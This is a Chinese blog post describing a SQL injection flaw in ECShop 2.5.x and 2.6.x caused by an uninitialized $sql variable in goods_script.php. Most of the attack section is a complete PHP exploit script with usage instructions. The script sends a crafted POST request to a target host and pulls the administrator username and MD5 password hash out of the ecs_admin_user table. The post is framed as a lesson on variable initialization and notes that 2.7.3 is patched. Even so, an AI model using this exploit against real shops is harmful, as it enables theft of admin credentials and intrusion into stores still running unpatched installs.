ecshop 2.6.2 版本的sql注入漏洞

最新推荐文章于 2022-12-20 10:53:28 发布
最新推荐文章于 2022-12-20 10:53:28 发布
阅读量1.3k 收藏
点赞数
分类专栏: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangjiehuan/article/details/7905036
版权

简要:     

这个漏洞不是我发现的。现在目前2.7.3也已经改了,所以放上来,是为了说明变量初始化的重要性。

refer link:http://bbs.wolvez.org/viewtopic.php?pid=179#p179

内容:

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:

  •     if (empty($_GET['type'])) { ... }
  •     elseif ($_GET['type'] == 'collection') { ... }
  •     $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
  •     $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

攻击方式:

在本地php.exe文件所在的目录下新建一个injection.php文件 ,然后通过cmd命令执行(unix下同理)。
执行命令 d:/php>php.exe injection.php ecshop,localhost.com /

解释 以上传递的参数以空格间隔开即可 $argv[0] = injection.php;$argv[1] = ecshop,localhost.com;$argv[2] =/;

攻击代码:

  • <?
  • error_reporting(7);
  • ini_set('max_execution_time', 0);
  • $host = $argv[1];$path = $argv[2];
  • $resp = send();
  • preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
  • if ($hash)
  •     exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
  • else
  •     exit("Exploit Failed!\n");
  • function send(){
  • global $host, $path;
  • $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
  • $data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
  • $data .= "Accept: */*\r\n";
  • $data .= "Accept-Language: zh-cn\r\n";
  • $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
  • $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
  • $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n";
  • $data .= "Connection: Close\r\n\r\n";
  • $data .= $cmd;
  • $fp = fsockopen($host, 80);
  • fputs($fp, $data);
  • $resp = '';
  • while ($fp && !feof($fp))
  •      $resp .= fread($fp, 1024);
  • return $resp;}
  • ?>

代码解释:

获取传递的参数argv,组装一个包含了sql自定义攻击代码的请求给goods_script.php文件,当type为一般数字的时候 就直接去连接 limit 10 了,一切源自没有初始化变量。

 

yangjiehuan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ECShop-v3.0.0漏洞复现
weixin_50866517的博客
08-16 1530
ECShop-v3.0.0漏洞复现配置文件写入导致代码执行二级目录三级目录 配置文件写入导致代码执行 在\ECShop -v3.0.0\install\index.php文件的第207-227行中,使用POST请求接收配置信息的值,并且直接传入到create_config_file方法。 case 'create_config_file' : $db_host = isset($_POST['db_host']) ? trim($_POST['db_host']) : '';
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1352
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
ecshop漏洞修复整理
热门推荐
龚清林的博客
06-01 6万+
1、ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/api.php、/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 ...
ECSHOP v2.7.3注入漏洞分析和修复
weixin_34334744的博客
04-13 1216
测试版本 漏洞条件 漏洞利用 产生原因 修复方案 1.测试版本 v2.7.3 RELEASE 20121106(最新) v2.7.3 RELEASE 20120411 2.漏洞条件 需登录到后台 3.漏洞利用 1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息” 为什么要搜索“用户信息”,还可以搜索其它的吗? 答案是搜索languages\zh_cn\u...
mysql语句执行超时设置
Sarah Cla的专栏
09-20 3万+
mysql 语句超时时间设置
天天快递配送插件 for ECSHOP2.6.2/2.7.0.rar
07-14
对天天快递插件的老版本做了一些修改,更新了快递的查询地址,供需要“天天快递插件”的...安装说明:此插件适用于ECSHOP V2.6.2和ECSHOP V2.7.0,文件解压后将文件夹ttkd下的两个文件夹直接上传到ecshop根目录下即可。
ECShop_V2.6.2_UTF8_Release0326.zip
02-04
ECShop_V2.6.2_UTF8_Release0326.zip
ecshop常见漏洞
10-30
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞ecshop的后台编辑文件/admin/affiliate_ck.php中,对输入参数auid未进行正确类型转义,导致整型注入的发生;ecshop的后台编辑文件/admin/...
ECShop v2.6.2 beta2 GBK.rar
07-07
ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。  [新增] 新增留言板审核功能  [新增] ...
ECshop--sqlTest
07-07
ECshop里面数据库操作demo
ECshop漏洞利用工具
11-11
ECshop漏洞利用工具 专门挖掘ECshop漏洞利用工具的漏洞,所以很好很强大的哦
ecshop的code.php漏洞,代码审计|ECShop-V3.0.0 漏洞集合
weixin_36461619的博客
04-13 789
0x00 背景不久前对ECShop-V3.0.0进行了一次粗浅的审计,还是发现了一些问题。本篇分析的漏洞利用条件是比较苛刻的,但是重要的是能够在审计的过程中学习到新的思路和知识,期待和师傅们的交流讨论。0x01 漏洞分析配置文件写入导致代码执行0x00 相关环境源码信息:ECShop-V3.0.0-UTF8-release0530问题文件: \ECShop30\install\index.php漏...
ECSHOP版本注入漏洞分析
11-25 3980
ECSHOP版本注入漏洞分析   2014-04-03 10:34:52|  分类: Pentest-skills |举报 |字号 订阅           下载LOFTER 我的照片书  | 初学PHP,看了两天语法,找了ecshop版本注入漏洞来分析,以小菜的角度沿着大牛的思路来前
Eecshop 4.x collection_list SQL注入 漏洞复现
weixin_44896127的博客
12-20 591
Eecshop 4.x collection_list SQL注入漏洞复现。
ECShop全系列版本远程代码执行高危漏洞分析+实战提权
xiaoi123的博客
09-20 1908
漏洞概述   ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行。攻击者无需登录站点等操作,可以直接远程写入webshell,危害严重。 漏洞评级   严重 影响范围   ECShop全系列版本,包括2.x,3.0.x,3.6.x等。 漏洞分析 0x01. SQL注入   先看 ecshop/user.php:302 ...
ECShop全系列版本远程代码执行高危漏洞复现
a1b2c3是弱口令
09-03 8503
预警 2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 早在1个月前阿里云态势感知就捕获到利用ECShop远程代码执行漏洞进行攻击的真实案例,由于当时该漏洞被利用进行攻击的量...
ecshop SQL注入通杀漏洞以及后台拿SHELL
11-25 8422
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术    标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给个警告,下面记载下这个Ecshop通杀漏洞吧! 先用下面的代码看下表的前缀(运气好下面的代码就把账号密码注射出来了) search.ph
ECShop 2.7.2 最新任意用户登陆漏洞0day
11-25 2291
ECShop 2.7.2 最新任意用户登陆漏洞0day (2015-04-02 16:07:28) 转载▼     由于最近项目需要, 查看了下商派最新发布的ECShop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显,且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台!  漏洞的影响  ECShop 2
ecshop前台漏洞
最新发布
09-02
- *1* *2* *3* [ECShop 4.0 前台SQL注入漏洞分析(需用户注册)](https://blog.csdn.net/weixin_39711867/article/details/115105521)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值